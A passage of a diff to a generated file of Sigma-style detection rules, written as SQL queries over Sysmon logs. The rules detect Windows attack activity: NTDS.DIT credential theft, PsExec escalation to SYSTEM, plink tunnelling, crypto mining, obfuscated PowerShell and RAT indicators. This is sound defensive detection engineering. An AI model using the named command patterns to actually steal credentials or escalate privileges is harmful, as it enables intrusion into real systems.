Execution", - "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", - "status": "test", - "description": 
"Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CVE-2022-29072 Exploitation Attempt", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "status": "experimental", + "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "cve.2022.29072" ], "falsepositives": [ - "Procdump illegaly bundled with legitimate software", - "Administrators who rename binaries (should be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" ], - "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" + "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" }, 
{ - "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", - "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "title": "PUA - AdvancedRun Suspicious Execution", + "id": "fa00b701-44c6-4679-994d-5a18afa8a707", "status": "experimental", - "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_use_mount_internet_share.yml" + "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" }, { - "title": "Potential SystemNightmare Exploitation Attempt", - "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "title": "TAIDOOR RAT DLL Load", + "id": "d1aa3382-abab-446f-96ea-4de52908210b", "status": "test", - 
"description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.execution", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_systemnightmare.yml" + "filename": "proc_creation_win_apt_taidoor.yml" }, { - "title": "Suspicious Ping/Del Command Combination", - "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", - "status": "experimental", - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. 
Its used to hide the file responsible for the initial infection for example", - "author": "Ilya Krestinichev", + "title": "Remote Access Tool - ScreenConnect Suspicious Execution", + "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "status": "test", + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" }, { - "title": "Potential RDP Tunneling Via SSH Plink", - "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "title": "Invoke-Obfuscation STDIN+ Launcher", + "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", "status": "test", - "description": "Execution of plink to perform data exfiltration and tunneling", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute 
PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_plink_susp_tunneling.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" }, { - "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "title": "Suspicious Process Patterns NTDS.DIT Exfil", + "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "status": "experimental", - "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Admins that use PsExec or PAExec to escalate to the 
SYSTEM account for maintenance purposes (rare)", - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" + "SELECT * 
FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR Image LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\apache%' ESCAPE '\\' OR Image LIKE '%\\\\tomcat%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" + "filename": "proc_creation_win_susp_ntds.yml" }, { - "title": "WMI Backdoor Exchange Transport Agent", - "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "status": "test", - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1546.003" - ], + "title": "Suspicious PowerShell Child Processes", + "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", + "status": "experimental", + "description": "Detects suspicious child 
processes spawned by PowerShell", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "filename": "proc_creation_win_powershell_susp_child_processes.yml" }, { - "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", - "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", - "status": "test", 
- "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SysmonEOP Execution", + "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "status": "experimental", + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" ], "falsepositives": [ - "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" ], - "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" + "filename": "proc_creation_win_hktl_sysmoneop.yml" 
}, { - "title": "Suspicious Service Binary Directory", - "id": "883faa95-175a-4e22-8181-e5761aeb373c", - "status": "test", - "description": "Detects a service binary running in a suspicious directory", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Dtrack RAT Activity", + "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "status": "stable", + "description": "Detects potential Dtrack RAT activity via specific process patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_susp_service_dir.yml" + "filename": "proc_creation_win_malware_dtrack.yml" }, { - "title": "Suspicious Processes Spawned by WinRM", - "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "title": "Copy From VolumeShadowCopy Via Cmd.EXE", + "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "status": "experimental", - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate WinRM usage" + "Backup scenarios using the commandline" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_susp_child_process.yml" + "filename": "proc_creation_win_cmd_shadowcopy_access.yml" }, { - "title": "Potential Crypto Mining 
Activity", - "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "status": "stable", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Schtasks Execution AppData Folder", + "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "status": "experimental", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.impact", - "attack.t1496" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of crypto miners", - "Some build frameworks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 
'%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_crypto_mining_monero.yml" + "filename": "proc_creation_win_schtasks_appdata_local_system.yml" }, { - "title": "Potential CommandLine Path Traversal Via Cmd.EXE", - "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "title": "Suspicious WmiPrvSE Child Process", + "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "status": "test", - "description": "Detects potential path traversal attempt via cmd.exe. 
Could indicate possible command/argument confusion/hijacking", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects suspicious and uncommon child processes of WmiPrvSE", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Java tools are known to produce false-positive when loading libraries" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE 
